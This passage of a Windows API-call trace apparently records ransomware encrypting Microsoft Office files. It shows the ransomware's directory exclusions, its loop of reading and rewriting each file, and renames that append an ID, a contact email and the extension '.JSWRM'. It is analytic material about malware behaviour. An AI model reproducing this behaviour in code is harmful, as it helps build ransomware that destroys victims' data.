Office\\root\\Office16\\PUBWIZ\\DGPICCAP.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpiccap.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPICCAP.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpiccap.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.130] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a53b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a53b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a53b55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x938f, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGPQUOT.DPV", cAlternateFileName="")) returned 1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2=".") returned 1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="..") returned 1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="...") returned 1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="windows") returned -1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="recovery") returned -1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="perflogs") returned -1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="documents and settings") returned -1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="system volume information") returned -1 [0141.130] lstrcmpiW (lpString1="DGPQUOT.DPV", lpString2="msocache") returned -1 [0141.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPQUOT.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPQUOT.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPQUOT.DPV", lpUsedDefaultChar=0x0) returned 11 [0141.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPQUOT.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPQUOT.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPQUOT.DPV", lpUsedDefaultChar=0x0) returned 11 [0141.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPQUOT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpquot.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.132] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37775) returned 1 [0141.133] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.133] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x9380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x9380, lpOverlapped=0x0) returned 1 [0141.136] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.136] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x9380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x9380, lpOverlapped=0x0) returned 1 [0141.137] CloseHandle (hObject=0x238) returned 1 [0141.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPQUOT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpquot.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPQUOT.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpquot.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.138] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGPQUOT.XML", cAlternateFileName="")) returned 1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2=".") returned 1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2="..") returned 1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2="...") returned 1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2="windows") returned -1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2="recovery") returned -1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2="perflogs") returned -1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2="documents and settings") returned -1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2="system volume information") returned -1 [0141.138] lstrcmpiW (lpString1="DGPQUOT.XML", lpString2="msocache") returned -1 [0141.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPQUOT.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPQUOT.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPQUOT.XML", lpUsedDefaultChar=0x0) returned 11 [0141.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPQUOT.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPQUOT.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPQUOT.XML", lpUsedDefaultChar=0x0) returned 11 [0141.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPQUOT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpquot.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.139] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7072) returned 1 [0141.139] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.139] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1ba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1ba0, lpOverlapped=0x0) returned 1 [0141.141] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.141] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1ba0, lpOverlapped=0x0) returned 1 [0141.141] CloseHandle (hObject=0x238) returned 1 [0141.141] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPQUOT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpquot.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPQUOT.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpquot.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.142] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a2da43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a2da43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a53b55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGPUNCT.DPV", cAlternateFileName="")) returned 1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2=".") returned 1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="..") returned 1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="...") returned 1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="windows") returned -1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="recovery") returned -1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="perflogs") returned -1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="documents and settings") returned -1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="system volume information") returned -1 [0141.143] lstrcmpiW (lpString1="DGPUNCT.DPV", lpString2="msocache") returned -1 [0141.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPUNCT.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPUNCT.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPUNCT.DPV", lpUsedDefaultChar=0x0) returned 11 [0141.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPUNCT.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPUNCT.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPUNCT.DPV", lpUsedDefaultChar=0x0) returned 11 [0141.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPUNCT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpunct.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.144] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3584) returned 1 [0141.144] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.144] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe00, lpOverlapped=0x0) returned 1 [0141.145] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.145] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe00, lpOverlapped=0x0) returned 1 [0141.146] CloseHandle (hObject=0x238) returned 1 [0141.146] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPUNCT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpunct.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPUNCT.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpunct.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.147] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x556, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGPUNCT.XML", cAlternateFileName="")) returned 1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2=".") returned 1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2="..") returned 1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2="...") returned 1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2="windows") returned -1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2="recovery") returned -1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2="perflogs") returned -1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2="documents and settings") returned -1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2="$RECYCLE.BIN") returned 1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2="system volume information") returned -1 [0141.147] lstrcmpiW (lpString1="DGPUNCT.XML", lpString2="msocache") returned -1 [0141.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPUNCT.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPUNCT.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPUNCT.XML", lpUsedDefaultChar=0x0) returned 11 [0141.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPUNCT.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGPUNCT.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGPUNCT.XML", lpUsedDefaultChar=0x0) returned 11 [0141.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPUNCT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpunct.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.148] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1366) returned 1 [0141.148] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.148] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x550, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x550, lpOverlapped=0x0) returned 1 [0141.150] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.150] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x550, lpOverlapped=0x0) returned 1 [0141.150] CloseHandle (hObject=0x238) returned 1 [0141.150] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPUNCT.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpunct.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGPUNCT.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgpunct.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.151] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a2da43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a2da43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a53b55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e87, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGREPFRM.DPV", cAlternateFileName="")) returned 1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2=".") returned 1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="..") returned 1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="...") returned 1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="windows") returned -1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="recovery") returned -1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="perflogs") returned -1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="documents and settings") returned -1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="system volume information") returned -1 [0141.151] lstrcmpiW (lpString1="DGREPFRM.DPV", lpString2="msocache") returned -1 [0141.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGREPFRM.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGREPFRM.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGREPFRM.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGREPFRM.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGREPFRM.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGREPFRM.DPV", lpUsedDefaultChar=0x0) returned 12 [0141.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGREPFRM.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgrepfrm.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.152] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28295) returned 1 [0141.152] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.153] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6e80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x6e80, lpOverlapped=0x0) returned 1 [0141.156] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.156] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6e80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x6e80, lpOverlapped=0x0) returned 1 [0141.156] CloseHandle (hObject=0x238) returned 1 [0141.156] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGREPFRM.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgrepfrm.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGREPFRM.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgrepfrm.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.157] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x75c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGREPFRM.XML", cAlternateFileName="")) returned 1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", lpString2=".") returned 1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", lpString2="..") returned 1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", lpString2="...") returned 1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", lpString2="windows") returned -1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", lpString2="recovery") returned -1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", lpString2="perflogs") returned -1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", lpString2="documents and settings") returned -1 [0141.157] lstrcmpiW (lpString1="DGREPFRM.XML", 